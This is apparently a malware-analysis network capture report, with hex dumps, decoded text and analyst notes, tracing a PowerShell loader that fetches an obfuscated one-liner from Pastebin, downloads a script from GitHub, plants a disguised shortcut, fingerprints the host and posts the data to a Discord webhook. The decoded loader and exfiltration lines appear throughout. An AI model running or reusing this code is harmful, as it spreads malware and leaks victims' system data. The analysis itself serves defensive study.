Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WTrRsr4xVDRbM%2BtmmK%2FYb7zoRzOk60MXbQRDs0NC%2BLQZWusvSe%2FqC12dDNnW0h4eOrME6S43T0nvZVsIrNkWNgJLPBQQ2SgDKmZ8uZGe%2BXKpN6gBggB5%2FKxUpy%2F7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=e939394e8afc11ef9fb26626db264c294957aff408cf85f2aac27ecd487ce3abc0608df3f14aa6beb19d6aa21afc0618; Expires=Sun, 14-Oct-2029 13:53:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=deb355df837f05f2c11a6e06cbbe06ca80c00ea7-1729000432; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                              2024-10-15 13:53:52 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 56 39 65 56 34 71 78 68 49 69 77 50 64 33 4a 38 64 42 4e 31 45 46 64 34 5f 46 30 59 77 57 44 50 45 61 66 4c 73 43 43 45 6e 67 49 2d 31 37 32 39 30 30 30 34 33 32 31 32 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 33 62 39 65 37 37 65 37 38 65 2d 44 46 57 0d 0a 0d 0a
Data Ascii (decoded from the raw bytes above; line breaks restored):
Set-Cookie: _cfuvid=V9eV4qxhIiwPd3J8dBN1EFd4_F0YwWDPEafLsCCEngI-1729000432120-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d304c3b9e77e78e-DFW
(empty line: end of response headers)


Session 3
  Source: 192.168.2.10:49713
  Destination: 104.20.3.235:443
  PID: 2040
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

2024-10-15 13:53:53 UTC  169 bytes  OUT
GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 13:53:53 UTC  396 bytes  IN
HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 13:53:53 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 83
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d304c43ad6a6ba1-DFW
                                                                              2024-10-15 13:53:53 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
Data Ascii (decoded from the raw bytes above; 139 bytes IN, line breaks restored):
85
calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
Note: "85" is the chunk-size line of the chunked transfer encoding (0x85 = 133 bytes), not part of the paste. The paste itself is one PowerShell line; the string concatenation assembles raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt, the URL requested in session 4, and calliT / WINDOWS_NT are the loader's aliases for Invoke-Expression and Invoke-WebRequest.
                                                                              2024-10-15 13:53:53 UTC5INData Raw: 30 0d 0a 0d 0a
Data Ascii (decoded; 5 bytes IN): "0" followed by CRLF CRLF, the zero-length chunk that terminates the chunked body.


Session 4
  Source: 192.168.2.10:49715
  Destination: 185.199.111.133:443
  PID: 2040
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

2024-10-15 13:53:54 UTC  222 bytes  OUT
GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-15 13:53:54 UTC  901 bytes  IN
HTTP/1.1 200 OK
Connection: close
Content-Length: 7508
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:53:54 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120060-DFW
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1729000435.685557,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: daf060581f2c7080d42bb66744e0e09ffe9c3cbb
Expires: Tue, 15 Oct 2024 13:58:54 GMT
Source-Age: 82
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
Data Ascii (decoded from the raw bytes above; first 1378-byte segment of the 7508-byte gaber.txt, of which the report displays only the beginning; line breaks restored):
sleep 5
rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
sleep 5


$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
if (-Not (Test-Path $googoogaagaa)) {
rm $env:tmp\onedrivefilesync.dll -force
New-ItemPropert
(segment display ends here)
Note: the script deletes the BeginSync.lnk it was launched from, then, since the file is now absent, removes onedrivefilesync.dll from %TMP% and begins a New-ItemProperty call that the displayed bytes cut off. The next three segments are a comma-separated decimal byte array rather than script: 4,0,239,190 is the little-endian 0xBEEF0004 shell item extension signature, 102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101 is "forfiles.exe" in UTF-16LE, the segment after it decodes to "...allit iEx; sal $env:os iWr; calliT(WINDOWS_NT p...", and 49,83,80,83 is the "1SPS" serialized property store signature, so the array is an embedded shell link (LNK) image whose target is forfiles.exe carrying the same loader command line.
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
Data Ascii (decoded from the raw bytes above; fifth segment, display truncated by the report; line breaks restored):
cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

# Retrieve GPU information
$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
(segment display ends here)
Note: the leading "$" of "$cpu" falls just before the displayed window. These Win32_Processor and Win32_VideoController queries are the system fingerprinting whose results (CPU, CPU Cores, GPU) appear in the Discord webhook body of session 7.
                                                                              2024-10-15 13:53:54 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
Data Ascii (decoded from the raw bytes above; last 618-byte segment, display truncated by the report; line breaks restored):
======================
"@
} | ConvertTo-Json

# Send the POST request to the webhook URL
try {
    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
    Write-Output "Message sent successfully."
} catch {
    W
(segment display ends here)
Note: "@ closes a PowerShell here-string holding the message text, ConvertTo-Json produces the body, and Invoke-RestMethod posts it to $webhookUrl. The variable's value is not within the displayed bytes, but session 7 shows the resulting POST to discord.com/api/webhooks/1285453590428782614/… with a 294-byte JSON body.


Session 5
  Source: 192.168.2.10:49717
  Destination: 172.67.19.24:443
  PID: 5024
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Note: a second PowerShell process (PID 5024) repeats the paste fetch of session 3 eight seconds later.

2024-10-15 13:54:00 UTC  169 bytes  OUT
GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 13:54:01 UTC  396 bytes  IN
HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 13:54:01 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 91
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d304c747c69475d-DFW
                                                                              2024-10-15 13:54:01 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
Data Ascii (decoded from the raw bytes above; 139 bytes IN, line breaks restored):
85
calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
Note: same paste content as session 3 (served from Cloudflare cache, identical Last-Modified); "85" is the chunk-size line, not script.
                                                                              2024-10-15 13:54:01 UTC5INData Raw: 30 0d 0a 0d 0a
Data Ascii (decoded; 5 bytes IN): "0" followed by CRLF CRLF, the terminating zero-length chunk.


Session 6
  Source: 192.168.2.10:49719
  Destination: 185.199.111.133:443
  PID: 5024
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Note: PID 5024 fetches gaber.txt again, as PID 2040 did in session 4.

2024-10-15 13:54:02 UTC  222 bytes  OUT
GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-15 13:54:02 UTC  901 bytes  IN
HTTP/1.1 200 OK
Connection: close
Content-Length: 7508
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:02 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120056-DFW
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1729000443.890340,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: e1038e87529da87f6be0cacbd73072e451e0315f
Expires: Tue, 15 Oct 2024 13:59:02 GMT
Source-Age: 90
                                                                              2024-10-15 13:54:02 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
Data Ascii (decoded from the raw bytes above; first 1378-byte segment, display truncated by the report; line breaks restored):
sleep 5
rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
sleep 5


$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
if (-Not (Test-Path $googoogaagaa)) {
rm $env:tmp\onedrivefilesync.dll -force
New-ItemPropert
(segment display ends here)
Note: identical bytes to session 4 (same ETag); the three byte-array segments that follow are the same embedded LNK image.
                                                                              2024-10-15 13:54:02 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                              2024-10-15 13:54:02 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                              2024-10-15 13:54:02 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                              2024-10-15 13:54:02 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
Data Ascii (decoded from the raw bytes above; fifth segment, display truncated by the report; line breaks restored):
cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

# Retrieve GPU information
$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
(segment display ends here)
